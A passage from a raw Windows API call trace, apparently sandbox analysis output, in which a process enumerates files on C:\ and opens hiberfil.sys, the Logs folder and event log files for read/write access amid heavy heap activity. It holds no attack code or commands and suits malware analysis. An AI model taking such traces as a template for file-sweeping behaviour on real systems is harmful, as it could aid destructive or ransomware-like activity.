0x885b8 [0071.289] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0071.289] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0071.289] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0071.289] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0071.289] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0071.289] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.289] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.289] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.289] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.289] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0071.289] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0071.289] AreFileApisANSI () returned 1 [0071.289] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\hiberfil.sys", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\hiberfil.sys", lpUsedDefaultChar=0x0) returned 16 [0071.289] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.289] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.289] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cce0 [0071.289] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0071.289] AreFileApisANSI () returned 1 [0071.289] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 16 [0071.289] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0071.289] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x885b8, cchWideChar=16 | out: lpWideCharStr="C:\\hiberfil.sys") returned 16 [0071.289] CreateFileW (lpFileName="C:\\hiberfil.sys" (normalized: "c:\\hiberfil.sys"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0071.289] GetLastError () returned 0x20 [0071.289] GetLastError () returned 0x20 [0071.289] SetLastError (dwErrCode=0x20) [0071.289] GetLastError () returned 0x20 [0071.290] SetLastError (dwErrCode=0x20) [0071.290] GetLastError () returned 0x20 [0071.290] SetLastError (dwErrCode=0x20) [0071.290] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0071.290] AreFileApisANSI () returned 1 [0071.290] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 16 [0071.290] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0071.290] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x885b8, cchWideChar=16 | out: lpWideCharStr="C:\\hiberfil.sys") returned 16 [0071.290] CreateFileW (lpFileName="C:\\hiberfil.sys" (normalized: "c:\\hiberfil.sys"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0071.290] GetLastError () returned 0x20 [0071.290] GetLastError () returned 0x20 [0071.290] SetLastError (dwErrCode=0x20) [0071.290] GetLastError () returned 0x20 [0071.290] SetLastError (dwErrCode=0x20) [0071.290] GetLastError () returned 0x20 [0071.290] SetLastError (dwErrCode=0x20) [0071.290] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0071.291] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0071.291] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cce0 | out: hHeap=0x20000) returned 1 [0071.291] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.291] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.291] FindNextFileW (in: hFindFile=0x78dd0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdf1d773, ftCreationTime.dwHighDateTime=0x1d1a04f, ftLastAccessTime.dwLowDateTime=0xa03727f1, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xfd9ec80, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Logs", cAlternateFileName="")) returned 1 [0071.291] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cce0 [0071.291] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f5c8 [0071.291] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cce0 | out: hHeap=0x20000) returned 1 [0071.291] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f5c8 | out: hHeap=0x20000) returned 1 [0071.291] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.291] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.291] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.291] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.291] AreFileApisANSI () returned 1 [0071.291] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs", lpUsedDefaultChar=0x0) returned 8 [0071.291] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.291] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.291] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cce0 [0071.291] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0071.291] AreFileApisANSI () returned 1 [0071.291] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0071.291] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d6d8 [0071.291] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x7d6d8, cchWideChar=8 | out: lpWideCharStr="C:\\Logs") returned 8 [0071.291] CreateFileW (lpFileName="C:\\Logs" (normalized: "c:\\logs"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0071.291] GetLastError () returned 0x5 [0071.291] GetLastError () returned 0x5 [0071.292] SetLastError (dwErrCode=0x5) [0071.292] GetLastError () returned 0x5 [0071.292] SetLastError (dwErrCode=0x5) [0071.292] GetLastError () returned 0x5 [0071.292] SetLastError (dwErrCode=0x5) [0071.292] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d6d8 | out: hHeap=0x20000) returned 1 [0071.292] AreFileApisANSI () returned 1 [0071.292] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0071.292] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d510 [0071.292] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x7d510, cchWideChar=8 | out: lpWideCharStr="C:\\Logs") returned 8 [0071.292] CreateFileW (lpFileName="C:\\Logs" (normalized: "c:\\logs"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0071.292] GetLastError () returned 0x5 [0071.292] GetLastError () returned 0x5 [0071.292] SetLastError (dwErrCode=0x5) [0071.292] GetLastError () returned 0x5 [0071.292] SetLastError (dwErrCode=0x5) [0071.292] GetLastError () returned 0x5 [0071.292] SetLastError (dwErrCode=0x5) [0071.292] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d510 | out: hHeap=0x20000) returned 1 [0071.292] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0071.292] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cce0 | out: hHeap=0x20000) returned 1 [0071.292] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.292] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.292] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.292] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.292] FindNextFileW (in: hFindFile=0x78dd0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6e97b025, ftCreationTime.dwHighDateTime=0x1d3275c, ftLastAccessTime.dwLowDateTime=0x6e97b025, ftLastAccessTime.dwHighDateTime=0x1d3275c, ftLastWriteTime.dwLowDateTime=0x21ffac8, ftLastWriteTime.dwHighDateTime=0x1d5d816, nFileSizeHigh=0x0, nFileSizeLow=0x28000000, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="pagefile.sys", cAlternateFileName="")) returned 1 [0071.292] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0071.293] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0071.293] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0071.293] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0071.293] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0071.293] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0071.293] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0071.293] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0071.293] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cce0 [0071.293] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f5c8 [0071.293] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0071.293] FindFirstFileExW (in: lpFileName="C:\\Logs\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78e50 [0071.297] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdf1d773, ftCreationTime.dwHighDateTime=0x1d1a04f, ftLastAccessTime.dwLowDateTime=0xa03727f1, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xfd9ec80, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.302] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5052fa31, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x5052fa31, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Application.evtx", cAlternateFileName="APPLIC~1.EVT")) returned 1 [0071.302] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0071.302] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0071.302] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0071.302] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0071.302] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0071.302] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0071.302] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0071.302] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0071.303] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0071.303] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0071.303] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0071.303] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0071.303] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x462e8 [0071.303] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0071.303] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0071.303] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0071.303] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0071.303] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0071.303] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0071.303] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0071.303] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0071.303] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0071.303] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0071.303] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0071.303] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0071.303] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0071.303] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0071.303] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0071.303] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0071.303] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.303] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.303] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.303] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.303] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0071.303] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0071.303] AreFileApisANSI () returned 1 [0071.303] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Application.evtx", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Application.evtx", lpUsedDefaultChar=0x0) returned 25 [0071.303] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0071.303] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.303] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.303] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0071.303] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0071.304] AreFileApisANSI () returned 1 [0071.304] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 25 [0071.304] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x32) returned 0x78f10 [0071.304] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x78f10, cchWideChar=25 | out: lpWideCharStr="C:\\Logs\\Application.evtx") returned 25 [0071.304] CreateFileW (lpFileName="C:\\Logs\\Application.evtx" (normalized: "c:\\logs\\application.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0071.305] GetFileType (hFile=0x428) returned 0x1 [0071.305] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78f10 | out: hHeap=0x20000) returned 1 [0071.307] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0071.307] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0071.307] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0071.307] CloseHandle (hObject=0x428) returned 1 [0071.307] AreFileApisANSI () returned 1 [0071.307] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 25 [0071.307] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x32) returned 0x78f10 [0071.307] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x78f10, cchWideChar=25 | out: lpWideCharStr="C:\\Logs\\Application.evtx") returned 25 [0071.308] CreateFileW (lpFileName="C:\\Logs\\Application.evtx" (normalized: "c:\\logs\\application.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0071.308] GetFileType (hFile=0x428) returned 0x1 [0071.308] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78f10 | out: hHeap=0x20000) returned 1 [0071.308] CloseHandle (hObject=0x428) returned 1 [0071.308] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0071.308] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0071.308] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0071.308] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0071.308] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0071.308] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0071.308] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0071.308] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0071.308] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0071.308] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0071.308] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0071.308] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0071.308] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0071.308] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0071.308] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0071.308] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0071.308] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0071.308] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0071.308] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0071.308] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0071.308] AreFileApisANSI () returned 1 [0071.309] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 25 [0071.309] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x32) returned 0x78f10 [0071.309] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x78f10, cchWideChar=25 | out: lpWideCharStr="C:\\Logs\\Application.evtx") returned 25 [0071.309] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Application.evtx" (normalized: "c:\\logs\\application.evtx"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5052fa31, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x5052fa31, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0071.309] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78f10 | out: hHeap=0x20000) returned 1 [0071.309] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0071.309] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0071.309] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0071.309] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.309] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.309] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x505ee5f0, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x505ee5f0, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="HardwareEvents.evtx", cAlternateFileName="HARDWA~1.EVT")) returned 1 [0071.309] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0071.309] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0071.309] HeapFree (in: hHeap=0x20000, dwFlags=0x0, 